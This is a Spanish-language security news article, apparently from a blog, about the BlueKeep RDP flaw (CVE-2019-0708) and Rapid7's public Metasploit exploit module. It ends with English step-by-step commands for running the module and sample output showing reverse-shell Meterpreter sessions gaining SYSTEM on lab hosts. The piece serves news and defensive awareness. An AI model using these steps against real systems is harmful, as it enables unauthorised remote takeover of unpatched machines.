BlueKeep, también conocido como CVE-2019-0708, es una vulnerabilidad en el servicio de protocolo de escritorio remoto (RDP) en versiones "antiguas" del sistema operativo Windows: Windows XP, Windows 2003, Windows 7, Windows Server 2008 y Windows Server 2008 R2.

Microsoft parcheó la vulnerabilidad crítica de RCE BlueKeep rastreada como CVE-2019-0708 e impactando en Windows XP, Vista, 7, Server 2003 y Server 2008 el 14 de mayo. y advirtió a los usuarios que apliquen los parches lo antes posible.  Pero para colmo, en agosto, Microsoft parchó otras dos fallas de ejecución remota de código (RCE), rastreadas como CVE-2019-1181 y CVE-2019-1182, encontradas en los Servicios de Escritorio Remoto (RDS) el 13 de agosto y afectando todas las versiones de soporte de Windows.

La vulnerabilidad es descrita como "wormable", es decir que puede propagarse de manera similar a la forma en que el exploit EternalBlue ayudó a que el ransomware WannaCry se propagara a millones de computadoras en 2017. Desde que se hizo público, la comunidad de ciberseguridad ha estado conteniendo el aliento colectivo por el lanzamiento de un primer exploit BlueKeep "armado", temiendo que pueda ser abusado de la misma manera y ayudar a potenciar un brote global de malware.



Microsoft ha dicho repetidamente a los usuarios que apliquen parches, e incluso la Agencia de Seguridad Nacional de EE.UU. (NSA), el Departamento de Seguridad Nacional, la Agencia de Seguridad Cibernética BSI de Alemania, el Centro de Seguridad Cibernética de Australia y el Centro Nacional de Seguridad Cibernética del Reino Unido han emitido alertas que instan a los usuarios y las empresas a parchear versiones anteriores de Windows.

Varias empresas de ciberseguridad e investigadores de seguridad han desarrollado exploits de BlueKeep, pero todos se negaron a publicar el código, temiendo sus consecuencias. En julio, la comunidad de infosec tuvo un primer susto cuando la compañía Immunity comenzó a vender un exploit privado de BlueKeep. Sin embargo, se mantuvo privado y nunca se filtró.


El equipo de seguridad Immunity también ha incluido un exploit BlueKeep en pleno funcionamiento en la versión 7.23 de su utilidad de prueba automática de pluma CANVAS el 23 de julio.  La compañía decidió agregar un exploit RCE completamente funcional a su herramienta de prueba de penetración y no solo un escáner para encontrar máquinas vulnerable



Algunos de ellos crearon herramientas diseñadas para buscar dispositivos Windows sin parches sin los efectos secundarios negativos [1, 2], así como reglas de detección como la firma Suricata BlueKeep de NCC Group. Los investigadores de Intezer también descubrieron una nueva variante de malware Watchbog que incluye un módulo de escáner BlueKeep en julio.

Nuevo módulo BlueKeep Metasploit

Ahora, Rapid7, la firma de ciberseguridad detrás de Metasploit, publicó un exploit de BlueKeep como un módulo más de Metasploit y disponible para todos (video).

A diferencia de las decenas de exploits de prueba de concepto de BlueKeep que se han cargado en GitHub en los últimos meses, este sí módulo puede lograr ejecución del código. Sin embargo, el módulo Metasploit ha sido un tanto "controlado". Actualmente solo funciona en modo "manual", lo que significa que necesita la interacción del usuario para ejecutarse correctamente.

Los operadores de Metasploit deben alimentarlo con un parámetro con información sobre el sistema al que desean apuntar. Esto significa que el exploit no se puede usar (aún) de manera automatizada como un gusano, pero funciona para ataques dirigidos.

Además, el módulo BlueKeep de Metasploit sólo funciona con versiones de 64 bits de Windows 7 y Windows 2008 R2, pero no con las otras versiones de Windows que también son vulnerables a BlueKeep. Este pequeño hecho también reduce su posible uso para actividades criminales, aunque no lo descarta.

700.000 sistemas aún vulnerables

El lanzamiento de esta explotación pública de BlueKeep se produce inmediatamente después de un mayor número de ataques dirigidos a servidores RDP, y BinaryEdge actualmente detecta más de 1,000,000 de máquinas sin parches visibles en Internet. Shodan también proporciona un tablero para rastrear los sistemas vulnerables de BlueKeep, con estadísticas por país. Solo en los Estados Unidos, por ejemplo, actualmente hay 71.977 servidores sin parchear.

A pesar de que hoy se lanzó un módulo, los expertos en seguridad no esperan ver campañas de malware o hacks aprovechados de inmediato. Sin embargo, para cuando los atacantes se acostumbren al nuevo módulo, todavía habrá muchos sistemas vulnerables. Esto se debe a que a pesar de haber tenido casi cuatro meses para parchear la vulnerabilidad de BlueKeep, la mayoría de los usuarios y compañías no pudieron aplicar los parches de Microsoft.


La propia trama de actividad diaria de RDP de Rapid7 muestra el aumento progresivo de la actividad relacionada con BlueKeep observada desde octubre de 2018.



Según un análisis de BinaryEdge, todavía hay 700.000 sistemas vulnerables a BlueKeep expuestos en Internet, y posiblemente millones más dentro de las redes y detrás de los firewall.

Si bien las defensas específicas y la detección contra este exploit en particular son útiles, las nuevas vulnerabilidades RDP de la familia "DejaBlue" han subrayado este protocolo en general como un riesgo. La complejidad inherente del protocolo sugiere que los errores conocidos hoy en día no serán los últimos, particularmente porque los desarrolladores e investigadores de exploits ahora tienen una comprensión más matizada de RDP y sus debilidades. La explotación continua es probable, al igual que la mayor sofisticación de explotación.

• Start msfconsole
• use exploit/rdp/cve_2019_0708_bluekeep_rce
• set RHOSTS to target hosts (x64 Windows 7 or 2008 R2)
• set PAYLOAD and associated options as desired
• set TARGET to a more specific target based on your environment
• Verify that you get a shell
• Verify the target does not crash

Exploitation Sample Output

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run[*] Exploiting target 192.168.56.101 [*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.101:3389 - Detected RDP on 192.168.56.101:3389 (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.101:3389 - The target is vulnerable.[-] 192.168.56.101:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually[*] Exploiting target 192.168.56.105[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.105:3389 - Detected RDP on 192.168.56.105:3389 (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.105:3389 - The target is vulnerable.[-] 192.168.56.105:3389 - Exploit aborted due to failure: bad-config: Set the most appropriate target manually[*] Exploit completed, but no session was created.msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2target => 2msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run[*] Exploiting target 192.168.56.101 [*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.101:3389 - Detected RDP on 192.168.56.101:3389 (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.101:3389 - The target is vulnerable.[*] 192.168.56.101:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.[*] 192.168.56.101:3389 - Surfing channels ...[*] 192.168.56.101:3389 - Lobbing eggs ...[*] 192.168.56.101:3389 - Forcing the USE of FREE'd object ...[*] Sending stage (206403 bytes) to 192.168.56.101[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49159) at 2019-09-06 01:26:40 -0500[*] Session 1 created in the background.[*] Exploiting target 192.168.56.105[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.105:3389 - Detected RDP on 192.168.56.105:3389 (Windows version: 6.1.7601) (Requires NLA: No)[+] 192.168.56.105:3389 - The target is vulnerable.[*] 192.168.56.105:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.[*] 192.168.56.105:3389 - Surfing channels ...[*] 192.168.56.105:3389 - Lobbing eggs ...[*] 192.168.56.105:3389 - Forcing the USE of FREE'd object ...[*] Sending stage (206403 bytes) to 192.168.56.105[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.105:49158) at 2019-09-06 01:26:58 -0500[*] Session 2 created in the background.msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > sessions
Active sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ BCOOK-PC 192.168.56.1:4444 -> 192.168.56.101:49159 (192.168.56.101) 2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN-VVEKS0PTPFB 192.168.56.1:4444 -> 192.168.56.105:49158 (192.168.56.105)

Fuente:
https://blog.segu-info.com.ar/2019/09/metasploit-lanza-exploit-y-modulo-para.html